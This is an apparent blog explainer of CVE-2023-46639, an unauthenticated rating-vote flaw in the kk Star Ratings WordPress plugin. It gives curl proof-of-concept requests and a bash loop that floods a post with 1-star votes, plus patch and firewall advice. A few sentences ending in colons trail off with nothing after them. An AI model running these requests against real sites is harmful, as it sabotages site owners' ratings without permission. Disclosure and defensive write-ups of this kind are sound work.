CVE-2023-46639 - How a Missing Authorization Bug in kk Star Ratings Lets Attackers Manipulate WordPress Ratings

If you use WordPress, there's a strong chance you want your visitors to leave feedback—maybe star ratings for your blog posts or products. Plugins like "kk Star Ratings" make that easy. But recently, a serious security bug (CVE-2023-46639) was found that lets attackers tamper with ratings on WordPress sites where this plugin is used.

In this article, I’ll explain the vulnerability, show how it could be exploited, and point you to more resources if you want to go deeper.

What is CVE-2023-46639?

CVE-2023-46639 is a vulnerability in the popular "_kk Star Ratings_" WordPress plugin. This bug is all about missing authorization—which, in simple terms, means the plugin sometimes doesn’t properly check if a user has permission to perform certain actions. As a result, attackers could:

Mess with your website’s feedback system and potentially hurt user trust.

The affected versions are all versions up to 5.4.5. If you use this plugin without updating, you could be at risk.

How Does the Exploit Work?

Normally, when users submit a rating, the kk Star Ratings plugin should check that the person submitting it is authorized (for example, a logged-in and valid user), or at least apply controls to prevent mass or automated abuse.

The Problem: The vulnerable function in the plugin does not properly check authorization. So, any user (even someone not logged in) can access the endpoint responsible for submitting ratings—if they know how to call it.

Example Exploit

An attacker could send a simple POST request to your website to rate any post, over and over. This could be done manually or automated in a script.

A basic "proof-of-concept" exploit using curl looks like this

curl -X POST \
  -d "action=kk_star_ratings_vote" \
  -d "post_id=123" \
  -d "stars=5" \
  https://yourwebsite.com/wp-admin/admin-ajax.php

Replace post_id=123 with the ID of whatever post or page the attacker wants to rate, and adjust the number of stars as desired.

Attackers can loop this request to manipulate results

for i in {1..50}; do
  curl -X POST \
    -d "action=kk_star_ratings_vote" \
    -d "post_id=123" \
    -d "stars=1" \
    https://victimsite.com/wp-admin/admin-ajax.php
done

This would drop a post’s ratings down by flooding it with 1-star reviews—all without needing to log in or authenticate.

Why Is This a Big Deal?

A website that relies on user ratings for credibility or revenue could easily be sabotaged. For example:

References & Original Sources

- NIST National Vulnerability Database - CVE-2023-46639
- kk Star Ratings Plugin Page
- WPScan Vulnerability Entry

How to Fix (Or Protect Yourself)

- Update the Plugin: If you use kk Star Ratings, upgrade to the latest version (anything after 5.4.5).
- Restrict the Endpoint: If you can’t update, consider using a web application firewall (WAF) to block unwanted POST requests to admin-ajax.php unless coming from logged-in sessions.

Final Word

The main lesson from CVE-2023-46639: even popular plugins can have serious bugs. Always keep plugins updated, and never trust user input or endpoints to be safe out-of-the-box.

If you think your site’s been targeted, audit your ratings or feedback system for spikes or unexpected entries.

Stay safe and keep your WordPress instances patched!


Got questions or want to discuss?
Feel free to check out the plugin’s support forum on WordPress.org or follow updates from the NVD listing.


Disclaimer: This post is for educational and defense purposes only—never attack any system you don't own or have explicit permission to test.

Timeline

Published on: 01/02/2025 12:15:14 UTC